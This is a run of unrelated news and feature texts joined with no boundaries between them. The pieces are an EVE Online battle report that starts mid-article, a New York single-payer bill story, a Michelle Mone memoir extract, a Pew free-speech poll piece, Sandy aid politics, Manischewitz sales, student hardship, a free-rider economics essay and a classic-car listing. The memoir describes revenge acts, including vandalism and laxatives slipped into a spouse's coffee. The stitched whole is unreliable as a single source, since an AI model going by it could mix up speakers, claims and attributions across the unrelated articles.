“ I 'm going all in , ” it read . “ Get here . ”
He summoned his ships in waves—first the Carriers , then the Dreadnoughts , then the Supercarriers . Once he knew they 'd loaded safely , he called for the Titans , praying the servers would n't buckle . They did n't . N3/PL faced the full might of the largest coalition in all of New Eden .
“ As soon as they dropped Titans , I knew it was going to be bad , ” N3/PL 's fleet commander , known as Manfred Sideous , said in a podcast after the battle .
Sideous ordered his Titans to hit Murph 's Dreadnoughts . Typically , a Titan 's Doomsday cannon destroys lesser ships with one blast , but Murph 's Dreadnoughts had been sufficiently armored to require two . This allowed him to bring in replacements faster than Sideous could take them out , buying him time to have his Titans target a single Pandemic Legion Titan . They pulverized the behemoth ship just 30 minutes after the battle started , giving CFC an early advantage .
By now , time dilation—which allows Eve 's servers to cope with huge loads—was slowing the game to 10 percent of normal speed . This has tactical implications , because it determines how often Doomsday cannons are used . The massive weapons require 10 minutes in real time to cool between blasts ; time dilation expands that to nearly two hours .
“ It becomes a game of managing Doomsdays , ” Murph said . “ Each individual fleet commander is relaying to me who has available Doomsdays , and I coordinate who should shoot at what target . ''
Murph chose targets based upon intel from spies within N3/PL and ordered his lesser starships—useless in a battle between Titans—to patrol nearby star systems , bolstering his supply line while limiting the enemy 's ability to bring in reinforcements .
Clusterfuck Coalition slowly gained the upper hand , losing five Titans to the eight it took from N3/PL . Six hours in , N3/PL aimed its Doomsday cannons at one of the most powerful ships on the field , the Avatar-class Titan owned by Sort Dragon , a high-level Eve player and a Russian fleet commander . Sort Dragon responded by overheating his defenses , briefly bolstering the ship 's armor . Murph summoned supply ships to make repairs as the gargantuan ship took damage . Meanwhile , Murph 's fleet—almost 1,400 ships in all—destroyed five more enemy Titans . N3/PL eventually brought down Sort Dragon , but it was too late . They 'd taken too much damage .
“ I did n't think they would escalate with Supercarriers and Titans and everything was going to be OK for me like it had been 100 times before , ” Sideous said of the battle . “ But it was n't . ”
N3/PL fought for several more hours before retreating . Murph 's forces mopped up until Eve Online 's servers went down for routine maintenance .
Twenty-two hours after it began , the Battle of B-R5RB was over .
Click image for high-resolution . Screenshot : opelwerk via Reddit
The Enemy Vows Revenge ———————-
It was the biggest in Eve 's history , involving 7,548 players belonging to 717 corporations and 55 alliances . More than 20 million soldiers were killed aboard the 600 or so Capital-class ships that were destroyed . Of those , 75 were Titans—16 from Murph 's forces and 59 from N3/PL . The previous record for most Titans lost in a single battle was 12 .
It proved to be costly in both the digital world and the real world . More than 11 trillion Interstellar Kredits worth of ships , munitions and equipment were lost . Converted to real-world cash , that 's about $ 300,000 . Much of that went down with the Titans , which cost around 100 billion ISK to build , putting them at about $ 3,500 apiece .
The Halloween War goes on , and Sideous vows to seek revenge . As thousands of players tally their losses and prepare for the next fight , many wonders how Pandemic lost sovereignty in B-R5RB to begin with .
The answer could n't have been any more mundane .
It appears someone forgot to check `` Automatic Bill Pay '' in his game settings . Pandemic Legion insists the box was checked , raising the possibility an inattentive player , a spy or even a bug in the game was to blame . Whatever the case , the rent did n't get paid . The biggest battle in the history of forever started with a clerical error .
`` One pilot 's action ( or inaction ) had repercussions for the entire universe , '' CCP Games , the game 's publisher , wrote in its official report on the battle , `` a butterfly wing causing a massive typhoon of destruction . ''
NYS Assembly passes single-payer health care plan
Assemblyman Phil Steck speaks at a press conference at the Capitol with Assemblyman Richard Gottfried ( left of Steck ) on Single Payer Healthcare . // NYS Assembly
NEW YORK STATE — A plan to create a universal single-payer health insurance plan in New York state passed the Assembly on Tuesday , May 16 , on the birthday of Health Committee Chairman Richard Gottfried ( D-75 ) , the bill 's sponsor and the Assembly 's most senior representative .
The legislation , which passed with a vote of 87 to 38 , has been advocated by Gottfried for years and just cleared the Assembly for the third consecutive year , having been kiboshed by the Republican-controlled Senate in 2015 and 2016 . Prior to that , a universal health care bill has n't made it to the Assembly floor since 1992 , when it also passed with a solid majority .
“ But then , ” said Gottfried , “ the focus of reform shifted to Washington . While the federal Affordable Care Act has done a lot of good , it 's clear that a lot of problems remain – and if we want to fix them , we have to do it ourselves . ”
The New York Health Act would establish a universal health care system within the state , known as New York Health , and expand coverage eligibility to include all residents , regardless of wealth , income , age or pre-existing condition . In addition , every enrollee would have access to the full range of doctors and service providers offered . The plan would provide comprehensive inpatient and outpatient care , primary and preventive care , maternity care , prescription drug costs , laboratory testing , rehabilitative care and dental , vision and hearing care .
State funding would be combined with federal funds that are currently received for Medicare , Medicaid and Child Health Plus to create the New York Health Trust Fund . The state would also seek federal waivers that will allow New York to completely fold those programs into New York Health . The local share of Medicaid funding would be ended , offering major property tax relief for New Yorkers .
According to an analysis by University of Massachusetts/Amherst Economics Department Chair Gerald Friedman , 98 percent of New Yorkers would spend less for health coverage and health care under New York Health than they do today . New York would save over $ 70 billion by : eliminating health insurance company administration and profit ; reducing health care provider and employer administrative costs ; and capturing savings from negotiating prices of pharmaceuticals and medical devices . Even after expanding coverage to all New Yorkers ; eliminating deductibles , co-pays , and out-of-network charges ; and increasing low Medicaid reimbursements , the analysis estimates New York Health would generate net savings of $ 45 billion .
Additionally , employer spending on health care currently eats up a median 12.8 percent of payroll costs on health insurance , up more than 50 percent in a decade , with small businesses spending even higher percentages . According to the Friedman study , New York Health could be funded through an income assessment averaging just 8.1 percent of payroll .
Assemblymember Phil Steck ( D-110 ) co-sponsor of the bill — A.4738 — and another longtime advocate for a single-payer health system , said , “ Far too many people have to forgo lifesaving treatment because they do n't have insurance , their insurance wo n't cover it or the costs are too high , and now we have a federal administration that seems hell-bent on making the situation worse . But here in New York , we know that 's not right – we fight hard for equality and health should not be the exception to the rule . Everyone , no matter their age , gender , race or net worth , should have access to health care . ”
Steck , who also co-sponsored the same legislation in 2015 and 2016 , said recent events have made it all the more urgent . With children born with pre-existing conditions at risk of losing coverage and mothers facing astronomical costs associated with giving birth , the situation has become dire , he said , noting that the repeal of the Affordable Care Act could leave as many as 2.7 million New Yorkers without health insurance coverage .
“ Without good health , everything else is moot , ” said Steck . “ It 's our responsibility to step up and lead the way because our health and the health of our children , friends , family and neighbors are in imminent danger. ” Steck pointed out that single-payer is a plan under which everyone gets health insurance coverage . It is not a means-tested plain like Medicaid in which people pay taxes for benefits they do not receive .
“ New Yorkers deserve better , ” Gottfried said . “ We should be able to go to the doctor when we need to , without worrying whether we can afford it . We should choose our doctors and hospitals without worrying about network restrictions . We deserve health coverage for all of us , paid for based on our ability to pay , not what the market will bear . ”
Gottfried and Steck will hold a town hall to discuss health care with constituents on Tuesday , June 6 , from 6 – 8 p.m. at the Colonie Town Library at 629 Albany Shaker Road in Albany .
“ The New York Health Act removes financial barriers to health care – the co-pays and deductibles – that keep some of my patients from seeing me when they need to , ” said Oliver Fein , MD , Chair of Physicians for a National Health Program-NY Metro . “ I also would n't have to worry about my patients affording the medications , lab tests or consultations that they need . I would n't have to waste countless hours fighting insurance companies to approve necessary medical care . The New York Health Act is a universal , single payer system that would guarantee equal access to care that is funded fairly – something every New Yorker and resident of this country deserves . ”
Assemblyman Angelo Santabarbara ( D-111 ) voted against the bill , saying that , while he supports the idea of single-payer , he would feel more comfortable with a plan that was drafted with more knowledge of , and in direct response to , federal actions . He also said he was n't convinced of its potential fiscal impacts .
Share this : Facebook
Twitter
Reddit
LinkedIn
Email
Print
Related
Comment on this Story
Ambitious : Michelle says she 's still working out what she wants to do with the next chapter of her life
She 's one of Britain 's most flamboyant businesswomen . Now Ultimo bra tycoon Michelle Mone is laying bare how her marriage became a battle more bitter than any she 'd faced in the boardroom . Today , in our concluding extract , she reveals how she finally exposed her husband 's affair — and plotted her revenge . . .
As a kid growing up in one of the most working class parts of Glasgow , I vowed that one day I 'd have a house like the ones I saw on my favourite TV programme , Dynasty .
Sure enough , the six-bedroom mansion which my husband Michael and I bought in 2008 had a sweeping staircase , just like the one featured in the home of the fabulously wealthy Carrington family .
There was also a huge walk-in wardrobe containing 100 pairs of Louboutin shoes and racks of dresses costing £4,000 a pop .
Downstairs we had a bar , a cinema with reclining leather chairs and even a nightclub out the back , not to mention five flashy cars on the driveway including Michael 's £100,000 Porsche .
To top it all , the house was in an affluent village ten miles from Glasgow which is known as Millionaires ' Row . For me , it could n't have been more perfect — but my parents hated visiting me there .
‘ It 's like a show-home , ' Mum shuddered , and she was right . I had installed four dishwashers because I could n't bear the sight of dirty plates , and our three kids were forbidden ever to put a pine coat-hanger into a walnut wardrobe , knowing that it would freak me out .
Once I returned from a business trip and found that the salt grinder had been left out in the kitchen . Panic . I needed to check nothing else was out of place .
Only after I 'd opened the cupboards one by one and ensured that the food labels were all facing the same way did I feel in control again .
This obsessive compulsive behaviour was a manifestation of my deep-seated unhappiness . I found comfort in regimenting the small things around me because I felt out of control in a much bigger part of my life — my marriage .
As I 've explained in this series , my marital problems began soon after the launch of our Ultimo lingerie brand in 1999 . Going to work became like walking through a minefield , our boardroom meetings constantly interrupted by one or other of us storming out , and the arguments continued at home where our sex life was virtually non-existent .
Incredibly , I never considered divorce . I came from a background where you got on with it , no matter what . But the beginning of the very dramatic end came in the summer of 2011 when I appointed 31-year-old Samantha Bunn as our new head of design .
Break-up : Michelle split with husband Michael after he became close to her new head of design Samantha Bunn
She was nine years younger than me and I took her under my wing . She was having big problems with her boyfriend so I felt sorry for her and said she could live in our guest annexe , right next door to the main house .
I treated her like a family friend . Some nights I invited her over for dinner and we 'd all sit around the kitchen table , chatting and laughing . But soon she started pushing the boundaries .
At work , she was always in Michael 's office , flirting and flicking her long dark hair . Michael shut the door , something he never usually did , but I could see what was going on because of the design of our headquarters . Built in the shape of a breast — well , we had made our fortune selling bras — they had glass walls everywhere .
While I was away on business , Sam started popping around for dinner with Michael and the kids . One night I saw him lifting a bottle of red out of the wine rack and he told me he was taking it next door because Sam had texted to say she 'd run out . An hour later he returned , claiming they had been just ‘ talking ' .
After that , I was constantly asking Michael if he was having an affair and his answer was always the same — ‘ You 're mad , you need to be sectioned ' .
He told everyone , even my parents , that I needed psychiatric help , but my suspicions continued to grow at our office Christmas party where Sam giggled into his ear and he ignored virtually everyone else .
Michelle Mone fired Samantha Bunn ( left ) after discovering she had struck up a romance with her estranged husband Michael
Michelle hired a private detective to prove that her ex-husband was having an affair her head of design Samantha Bunn
I wanted to go home at 7pm so the staff could let their hair down without us around , but Michael refused to leave . That night , I paced our bedroom waiting for him to return . Finally , at 3.30am , I heard a taxi pull into the drive and the two of them giggling .
That was it . I 'd had enough of this heartache and nobody made a fool out of me . I confronted him and we had yet another explosive argument and barely spoke for the next week .
When it got to Christmas Day we agreed that we 'd put on a happy front for the sake of the children , who were then 12 , 15 and 19 , but after taking the turkey out of the oven Michael suddenly walked out .
It was awful . I was crying and so were the kids . He did n't come back until Boxing Day morning , and we agreed then that our marriage was over . I put out a Press statement to that effect because that way I knew there could be no going back , and I could draw a line under it and finally move on .
The release made no mention of Sam . I was doing this for closure , not out of spite , but Michael remained adamant that there was nothing happening between them , and I wanted proof that there was to reassure both myself and my family that I was n't going mad , as he had kept insisting I was .
LET 'S GO NEXT DOOR TO THE BEDROOM , SUGGESTED SHANE WARNE Indecent proposal : Warne was 'too wild ' for Michelle Newly single after 22 years of marriage , I got a rude introduction to the modern dating scene from the Australian cricketer Shane Warne , Liz Hurley 's ex . We were fixed up by our mutual friend , the former England cricket captain Michael Vaughan . Since Shane was in Australia and I was in the UK , we could n't meet straight away and spent two months constantly texting and chatting over the phone . He was good fun , and although I felt the odd text message from him was a bit too explicit , I was excited about seeing him when he flew to London in February 2014 . He was supposed to land on a Saturday , and we planned to meet that evening , but I received a text on the Friday saying he had arrived a day early because he had to ‘ sort some things out ' with Liz . That happened to be Valentine 's Day , so my mind raced as I wondered whether he was two-timing me . The following evening , I got all dressed up in my suite at the Dorchester hotel , before receiving a text at 7.45pm , 15 minutes after he was supposed to meet me , saying he could n't make it . I was furious , and even more so the next morning when I saw newspaper photographs of him getting out of a car with Liz . Later that day , when he asked if he could come and see me , I almost said no , but he insisted so vehemently that nothing was going on between them that I gave him the benefit of the doubt . Since paparazzi were hanging around the hotel for the BAFTA Awards , we agreed that he should come to my suite which had a lounge where we could sit and chat . Finally , after all that build-up , he walked in . We opened a bottle of champagne and talked , but it was n't the sort of conversation I 'd expected . He chain-smoked about 35 cigarettes — and I hate smoking — and after about an hour he got restless . ‘ Can we go next door to the bedroom ? ' he asked suggestively . I made it clear that I was not that kind of girl and , besides , though he 's a nice , fun guy , he was n't my type in the end . He was a bit too wild for me . All in all , it was really disappointing but at least I learned something from the experience . Never again will I start texting a guy without meeting him first because , quite frankly , Shane wasted two months of my life .
So I decided to flush them out like rats . That January , the two of them were due to visit our factories in Hong Kong with some of our technical staff and I gave details of their itinerary to a private detective recommended via contacts of my friend , Carol Vorderman .
I 'd got to know Carol well after we starred together on Celebrity Apprentice , and while Michael and Sam were away in Hong Kong she took me out to lunch in London to cheer me up .
Halfway through our meal I got a call from the private detective , suggesting we meet urgently . He came to the restaurant , took me aside , and handed me a big brown envelope .
Inside I found pictures of Michael snogging Sam at the airport and of her going back to his hotel room . Deep down I knew my marriage had been over for years , but I still felt indescribable pain . My knees buckled and I fell to the ground crying , comforted by Carol who ran over and wrapped her arms around me .
Back in Scotland my grief turned to anger . After texting Michael to tell him that he had been caught red-handed , I grabbed a knife and went to town on his beloved Porsche , scratching it to shreds .
Then I charged round to the guesthouse where Sam was living — thanks to the kindness which she had betrayed — and threw all of her possessions into the garden , the dressing table along with them . I was like a banshee .
I then kept calling Sam 's phone until she picked up .
After defacing her husband 's Porsche , Michelle had to give Michael £8,000 for the damage to the car
‘ You b * * * * , you lied to me , ' I screamed .
‘ It 's not like that , ' she stuttered . ‘ It only started a few days ago . '
‘ You 're a liar and you 're fired , ' I blasted .
When Michael got back from Hong Kong , the first thing he raged about was his Porsche .
‘ My f * * * ing car , ' he yelled . ‘ You 'll pay for that . '
‘ You 're lucky I did n't set fire to it , ' I replied .
In the coming weeks , he told the press that there had been no relationship with Sam prior to our split at Christmas — and I even got a letter from her lawyers saying that she was suing me for unfair dismissal .
What was I supposed to do ? Sit down and design bras with her ? I would probably have stuck the needles and scissors up her backside , but my lawyer advised me to pay her off and she was n't the only cost . I also had to give Michael £8,000 for the damage to his car . But the fighting between us was not over even then .
Any reasonable person who 'd had an affair would have moved out of the family home , but Michael tried to insist that it was I who should go . There was no way I would leave my house and my kids , and what followed was like that film The War Of The Roses in which divorcing husband and wife Michael Douglas and Kathleen Turner try everything to get each other to leave the house and end up in a fight to the death .
Weight battle : Entrepeneur Michelle Mone went from a binge-eater , left , in 2003 , to svelte pin-up , above
Every night there was a race to the master bedroom . Whoever was there first got the bed . I put his favourite shirts and cufflinks in the bin . I let down his car tyres . I cut holes in all his boxer shorts . I put laxatives in his coffee on the day that he and Sam were going to a wedding — God only knows if that worked . Michael probably did things to me too because quite a lot of my stuff went missing , but somehow we remained under the same roof for eight months before agreeing to alternate weeks at the house .
On the day I moved out to a hotel for his first week I crept up to the master bedroom , pulled back the luxurious throw and threw a bucket of cold water over his side of the bed before replacing the covers .
Later the kids phoned to ask why I had done this and , looking back , I can see I was selfish . I should have thought about the effect all this would have on them , but it was my way of getting my hurt out .
At the same time , I was also fighting Michael for control of the company . Who would buy out who ? It started with a low blow from him . ‘ You 're fired , ' he said one day , pointing at me as if he was Lord Alan Sugar .
I 'd always left the legal side of things to him and now learned that he had somehow ended up with 48 per cent of our shares , compared with my 47 per cent . But still he needed 50 per cent to control the business and I managed to persuade Tom Walker , a silent shareholder who owned 5 per cent , to back me , and together we had more power than Michael .
Hidden troubles : Michelle and Michael , above in 2010 , maintained the image of the perfect couple
That was round one of what felt like the longest boxing match in history . Whatever punches Michael threw I got up the next day ready for battle .
He might have been more intelligent than me — he was a university graduate whereas I had left school at 15 with no qualifications — but I had more fight and stamina , although I was crying myself to sleep and downing a bottle of wine a night to numb the pain of it all .
With news of our problems now public , the company value crashed as customers wondered what was going on . Eventually I managed to find new backers , but they would only invest if Michael left — and he refused to accept what was being offered for his shares .
Finally , in February 2013 , with only weeks to go before we went under , our bank told Michael that he had to accept the deal . That same day I agreed with him the paperwork for our divorce , and soon afterwards we sold the house .
The biggest battle of my life was finally over , and in August 2013 the kids and I moved into a once derelict Victorian building in Glasgow which I had spent months transforming into our new dream home . Living there was a new beginning for us , and the feelings of bitterness which used to eat me up at night slowly vanished .
Not even the news that Michael had launched a rival lingerie company with Sam bothered me , and I wished them all the best on their recent engagement .
As for me , I hope that one day I 'll meet the perfect guy , but I 'm not sitting around waiting for it to happen because there 's so much I still want to achieve .
These days I want to spend more time with my kids , and more time working on ‘ me ' , and so I have sold 80 per cent of Ultimo , hanging up my bra as Chief Executive .
I 'm still working out what I want to do with the next chapter of my life . It will definitely involve lots of motivational speaking , inspiring other people to make the most out of their lives , and if there 's one lesson I 've learned above all , it is that material things do not bring you happiness .
If only I could go back in time and tell that to the little girl who sat at home in the East End of Glasgow , watching TV with her sausage-and-chips supper on her knees and dreaming of the riches she saw on Dynasty .
While two-thirds of Americans correctly believe the U.S. government should not prohibit speech that offends minorities , a shockingly high number of millennials—40 percent—support such censorship . Young people , it turns out , are more likely to favor suppression of offensive speech than older Americans .
That 's according to the Pew Research Center , which found the results “ striking ” :
Even though a larger share of Millennials favor allowing offensive speech against minorities , the 40 % who oppose it is striking given that only around a quarter of Gen Xers ( 27 % ) and Boomers ( 24 % ) and roughly one-in-ten Silents ( 12 % ) say the government should be able to prevent such speech .
The demographic breakdown was also interesting . Non-whites , men , Republicans , and the college-educated were more pro-speech than whites , women , Democrats , and people without a college degree .
American attitudes toward free speech are much more favorable , on the whole , than European views . Nevertheless , German millennials are actually less censorious than their American counterparts . British young people hold views that are about the same as Americans .
These results seem to confirm—at least in very abstract terms—the results of a recent survey of college students that found majority support for mandatory trigger warnings and censorship of hateful speakers .
It would seem that libertarians—and everyone else who values a free and open discourse—must do a better job to persuade young people that robust protection of free speech ( including offensive , hateful speech ) is the cornerstone of civilized society .
After a late-night decision from House Republicans to delay a vote to provide billions of dollars in relief to states the hardest hit by Superstorm Sandy , House Speaker John Boehner on Wednesday attempted to tamp down a backlash , telling colleagues he would bring up one part of the aid package to a vote at the end of the week . New Jersey and New York Republicans said Wednesday afternoon that Boehner promised them he will vote on a $ 10 billion extension for the government 's flood insurance fund—set to run out next week—on Friday .
The speaker said he will bring the other $ 51 billion in aid to a vote January 15 .
Gov . Chris Christie of New Jersey , a Republican , blasted Boehner earlier on Wednesday for not putting the bill up to a vote . Christie warned Boehner and the Republican House majority that they would feel the wrath of outspoken New Jersey and New York politicians .
New York `` Gov . [ Andrew ] Cuomo and I are not wallflowers . We are not shrinking violets , '' Christie said . He called the delay in aid `` callous '' and an act of putting politics over what 's best for the victims of a major storm trying to rebuild .
`` All I can tell you is that this was the speaker 's decision . His alone , '' Christie said , adding that Boehner did not take several of his calls Tuesday night .
Some Republicans have expressed reservations about money in the aid package that did not go directly to relief efforts and questioned why the bill needed to be passed quickly when Congress was also dealing with the `` fiscal cliff '' and other issues . It seemed on Tuesday that Congressmen from the Northeast and House Majority Leader Eric Cantor had hammered out a deal to split the aid bill up into two parts , but then Boehner unexpectedly declined to bring it up for a vote .
`` It 's a Boehner betrayal , '' said Sen. Chuck Schumer , Democrat from New York .
But Republicans from the Northeast were also mad . On the House floor , Rep. Peter King , a Republican from storm-ravaged Long Island , N.Y. , blasted the delay as `` indefensible '' and said Congress had a `` moral obligation '' to hold the vote . On Wednesday , he urged New Yorkers to withhold all donations to congressional Republicans in an appearance on Fox News , apparently so hopping mad about the delay that he does n't mind turning on his own party .
`` I 'm saying right now : Anyone from New York or New Jersey who contributes one penny to congressional Republicans is out of their minds , '' King said . He even hinted he might jump ship from the Republican Party altogether if they did n't vote soon .
By Wednesday afternoon , his tone had softened after Boehner promised to vote on the $ 9 billion in aid on Friday and an additional $ 51 billion by Jan. 15 .
Democrats have singled out Boehner for the delay , but also blasted other Republicans for their criticisms of the bill . Schumer said in a press conference on Wednesday that he was `` infuriated '' by a comment from Rep. Darrell Issa , a Republican from California , who said the bill did n't move in the House because it was filled with pork . Schumer said Issa should speak to one of the hundreds of thousands of homeowners who need help repairing their homes and will now face a delay in getting relief .
`` Tell that homeowner to his face ... that it 's pork , '' Schumer said . He added that Issa would surely not want to face such a delay if an earthquake hit his home state : `` I know he would n't say the same thing about California . ''
President Barack Obama also urged action on the bill on Wednesday in a statement .
Some congressional Republicans have said the $ 60 billion bill , which had already passed in the Senate , is too expensive and does not provide enough oversight for how the funds are spent—and that there is no real need to pass it quickly . The bill contains $ 11.5 billion for the Federal Emergency Management Agency 's disaster relief fund , $ 17 billion for community grants that help businesses and homeowners with rebuilding and repairs , and $ 9.7 billion in government flood insurance . An additional $ 11.7 billion would go to fixing damaged mass transit systems and $ 5.3 billion for the Army Corps of Engineers to prevent future flooding .
`` FEMA has plenty of money , there 's no immediate needs , '' House Appropriations Chairman Hal Rogers , R-Kentucky , told CNN on Tuesday . `` FEMA has enough money to last until at least late February-March . ''
Manischewitz , the much beloved sweet wine that is ubiquitous in Jewish homes has found a new a fan base among non-Jews—particularly Asian Americans—who seem to have a taste for the sweet , concord wine , the Wall Street Journal reports .
Constellation Brands , the wine and spirits maker that acquired the Manischewitz wine business in 1987 last year produced over 900,000 cases of Manischewitz , the WSJ reports , making it the top-selling kosher wine in the U.S. A vast percentage of those cases , about 200,000 , were exported to 20 countries , with the top markets in Latin America , the Caribbean and South Korea .
For many in the U.S. , the wine has broad appeal because of its sweet and fruity flavor , low alcohol content and low price point , usually around $ 5 for a bottle .
Tony Chen , a customs broker who is a several years ago noticed Asian grocery stores in the Los Angeles area stocked Manischewitz , told the WSJ that the wine resembles a fermented drink popular in Northern China . A nanny who was working for his family told him she used to make a similar wine by putting grapes in a jar with lots of sugar , mashing it into a mixture and letting it ferment . “ Their own version of grape hooch , ” Mr. Chen told the WSJ .
Manischewitz first started producing wine over 70 years ago with grapes from upstate New York . In those days the large batches of grapes shipped down from the vineyards to the factory in Brooklyn were not always palatable . To ensure the wines were drinkable , sugar was added , giving it its hallmark sweet flavor , Vinepair reports .
John Cristal , a liquor store worker in the Bronx says that he sells half his stock of Manischewitz to Filipino , Latino , and African-American customers . Those seeking specifically kosher wines prefer a more dry , imported variety , he told the WSJ .
But for the syrupy Manischewitz ; “ I can never keep it on the shelf for long , ” he told the WSJ .
University has never been a time to splash the cash , but with average tuition fees in England now `` the highest in the world '' , coupled with the rising cost of living , some undergraduates are going without food in order to make ends meet .
According to a survey of over 800 students , nearly a third said they had gone without eating for a day or more to help cope with the cost of living at university , with some saying they had used foodbanks to get by . One in ten also resorted to payday loans to see them through .
The research , conducted by online forum , The Student Room , also revealed that 13 per cent of undergraduates admitted stealing to make ends meet . Of those that admitted theft , 79 per cent said they had stolen food - followed by alcohol and money ( 51 per cent ) .
The study , which asked university students across the country how they coped with soaring living costs , revealed that many undergraduates found it hard to make ends meet , with one in five doing without heating or electricity for a week or more .
The findings support previous research , released last year , which suggested that university students were turning to gambling , medical trials and adult work in order to supplement the maintenance loan provided by the Government .
Photo : GETTY
According to the annual National Student Money survey , the maintenance loan leaves the average student `` around £265 short each month '' .
Hannah Morrish , university community manager at The Student Room , said the research highlighted how `` vulnerable '' many students were , `` not just financially , but socially as well '' with one in five working more than one job .
“ For any students who are struggling to make ends meet we want to stress that there is an active and easy to access support network available , '' she said , `` from applying for student hardship funds from universities through to independent and anonymous financial advice forums .
She added that The Money Charity , National Debtline and the Citizens Advice Bureau were all `` great starting places for debt counselling . ''
Further findings from today 's survey revealed that one in ten students had sold drugs on campus to cope with the cost of living , with the same number ( 13 per cent ) entering a relationship with a `` sugar mummy/daddy '' to help make ends meet .
`` Across the country everyone is feeling the stress of rising living costs and , unfortunately , students are no exception . '' Hannah Morrish
The research follows warnings from the National Union of Students ( NUS ) that the maintenance loan was “ not keeping pace with the rise in living costs ” .
The Government 's recent decision to cut maintenance grants awarded to the poorest students , also drew criticism from the union .
Under the plans announced in the summer Budget , from 2016 maintenance grants will be replaced with loans that have to be paid back once students earn over £21,000 a year .
Megan Dunn , NUS national president , said : “ The scrapping of maintenance grants is an enormous change that would affect thousands of students , but the government has failed to recognise just how widespread the impact would be .
“ The most marginalised students would be the worst affected and could even be shut out of the education system completely . This would be a devastating outcome stemming from a poorly researched decision . ''
She continued : `` NUS believes the government should be cutting the cost of education , not plunging students further into debt . ”
By Nicholas Gruen
The free rider problem
Anathematized and stigmatized today , free-riders built the lion 's share of the prosperity we enjoy today . Does that mean we should ‘ share ' or ‘ pirate ' more copyrighted things on the internet ? Not necessarily . The free rider problem is real enough . If it costs vast sums to test a new drug , we ca n't expect the market to do so if all that investment can be undercut by imitators .
But here 's the thing . In addition to the free rider problem , which we should solve as best we can , there 's a free rider opportunity . And while we whine about the problem , the opportunity has always been far larger and its value grows with every passing day .
The American economist Robert Solow demonstrated in the 1950s that nearly all of the productivity growth in history – particularly our rise from subsistence to affluence since the industrial revolution – was a result not of increasing capital investment , but of people finding better ways of working and playing , and then being copied . A little of this innovation was fostered by intellectual property rights which give temporary monopolies in technology . But much less than you 'd think .
Most innovation ca n't be patented . And after patents expire in 20 years ( it used to be less ) it 's open slather . We 're not paying royalties to the estates of Matthew Bolton and James Watt for their refinements to the piston engine . But we 're still free riding on their work . In other words , free-riding made us what we are today .
Get Evonomics in your inbox
So let 's take a step back and address the issue of free-riding from a different perspective . If , as a society today , we had to choose between addressing the free rider problem and seizing the free rider opportunity , taking the latter option wins hands down . In fact we do n't have to choose . We should be doing both as best we can on their merits in individual situations , but it 's a reflection of our mercantilist culture that the “ free rider problem ” is both a household expression and an endlessly stoked social anxiety whereas the “ free rider opportunity ” is so unfamiliar that it sounds deeply counterintuitive – subversive even .
The free rider opportunity
At the birth of modernity Thomas Jefferson spoke of the free rider opportunity more eloquently than any statesman then or since :
He who receives an idea from me , receives instruction himself without lessening mine ; as he who lights his taper at mine , receives light without darkening me . That ideas should freely spread from one to another over the globe , for the moral and mutual instruction of man , and improvement of his condition , seems to have been peculiarly and benevolently designed by nature , when she made them , like fire , expansible over all space , without lessening their density in any point , and like the air in which we breathe , move , and have our physical being , incapable of confinement or exclusive appropriation .
Far from wanting to ignore the free rider problem , Jefferson was on top of that too , spearheading the institutionalization of intellectual property . But having done so , throughout his life , including in his administration of patents , he sought balance between dealing with the problems and seizing the opportunities presented by free riding . He supported relatively narrow interpretations of patent monopolies around specific applications of technologies to preserve the freedom to copy in divergent fields .
As his words above suggest , Jefferson understood that sharing knowledge spread both prosperity and wisdom from innovators to the whole of humanity and had done so from time immemorial . But there 's also a sense in which he saw the opportunities growing progressively larger and more exciting as we move into the information age . Jefferson was fresh from the rise of blogging – then known as pamphleteering – in which disputants argued back and forth in as close to ‘ real-time ' as the printing presses would permit .
Free-riding and public goods
Though rarely ( if ever ) remarked upon , free riding problems and opportunities lie at the heart of public goods . Theorised initially in 1954 by Paul Samuelson as goods that are “ joint in consumption ” , the idea is implicit in Vincent and Elinor Ostrom 's quadrant in 1977 .
In economic jargon , public goods are both non-excludable and non-rival . For example , Wikipedia currently offers fireworks displays as an example of a public good – at least over a localized area . Everyone can see them – so they are non-excludable . And one person 's enjoyment does not hinder another 's – so they are non-rival .
And it turns out that these two characteristics – rivalrousness and excludability – define the dimensions of free riding ! If non-excludability creates a potential free rider problem ( obstructing a market from charging , and so , providing the good ) , non-rivalrousness creates a free rider opportunity ( once created , Thomas Jefferson 's dream of limitless sharing comes into view . )
And guess which side of this polarity the dismal science orients itself around ? As the Ostroms explained in their article : “ Public goods . . . present serious problems in human organisation ” . This provides some insight as to why our friends from the intellectual property lobby have so much more success appealing to the public 's anxieties about the free rider problem than more moderate voices arguing , as Jefferson did , for strict limits on those rights to minimise the extent to which they obstruct free rider opportunities .
The new public goods of the 21st Century
As I indicated above , we can usually deal with both the free rider problem and opportunities very satisfactorily on their merits . But the new value creation of the 21st Century shows us that sometimes we have to choose . And it shows how to choose if there 's any serious doubt . Imagine you have some service to offer on the web . It 's a service that people will value greatly and as they benefit from it they 'll make their own contributions to the service .
You can solve the free rider problem by supplying the service behind a paywall . So you 'll minimise the extent to which people free ride on your great new service . If people really like it they 'll be prepared to pay good money .
But , but , but but .… a paywall would hit audience numbers hugely , which degrades the extent to which the site can be monetized by advertising and the contributions of the users . So solving the free rider problem hugely degrades the free rider opportunity .
And so it is that a vast portion of the new value that 's been built on the net has come to this fork in the road – and plumped for opportunity . Thus Google generates many hundreds of billions of dollars every year but monetizes only a small fraction of that value . But $ 60 billion per annum is enough to make its founders rich beyond their wildest dreams .
Ditto Facebook , Twitter and any number of other services . This formula of embracing the free rider opportunity is apparent not just in for profit ventures but in philanthropic ventures such as Wikipedia and the Internet Archive both of which could charge for their services , but only at the cost of massively degrading their mission .
Conclusion
Though the illustrative examples of public goods in economic textbooks are reassuringly worthy – like military defense and public infrastructure – Wikipedia 's more festive image of fireworks radiating out from a city skyscraper better celebrates Jefferson 's dream of sharing human knowledge in its unfolding abundance .
And there 's much more to be said about the future of public goods . But before we can do it we have to go right back the last economist to fully appreciate the indispensable role public goods play at every level of our lives and have done so since our rise from our origins on the African Savannah . And the last economist to do that was the first economist –Scottish moral philosopher Adam Smith .
To be continued .…
2016 April 26
This 1971 Opel GT ( chassis 772350756 ) is a good-looking example of GM Europe 's stylish mini-Stingray . Made for just five years and based on the Kadett B , these are prone to rot and it 's not often that we see good ones anymore . This example is said to have 65k miles and no rust . Find it here on eBay in Carlsbad , California with no reserve and fast bidding . Special thanks to BaT reader P L. for this submission .
Nicely presented and photographed extensively , this car appears quite well-kept inside and out . Paint holds a good shine , and only minor imperfections are noted . The car sits over original steel wheels with trim rings , though with stock springs they always look to be sitting a bit high . All lighting including manually-operated pop-up headlights is said to work correctly .
